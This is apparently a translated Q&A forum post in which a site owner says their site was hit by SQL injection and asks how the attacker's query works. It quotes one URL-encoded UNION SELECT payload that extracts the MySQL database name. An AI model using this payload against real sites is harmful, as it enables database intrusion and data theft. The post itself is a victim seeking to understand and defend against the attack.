小编sur*_*ram的帖子

网站已被SQL注入攻击

最近我的网站被SQL注入攻击.黑客使用以下查询来获取我的数据库名称.我无法理解他们写的这个查询.

查询:

=-999.9%20UNION%20ALL%20SELECT%20concat(0x7e,0x27,Hex(cast(database()%20as%20char)),0x27,0x7e),0x31303235343830303536,0x31303235343830303536,0x31303235343830303536--
Run Code Online (Sandbox Code Playgroud)

查询运行后显示整数结果,如" 74545883".

你能解释一下查询是如何工作的吗?

mysql sql-injection

33
推荐指数
3
解决办法
3万
查看次数

标签 统计

mysql ×1

sql-injection ×1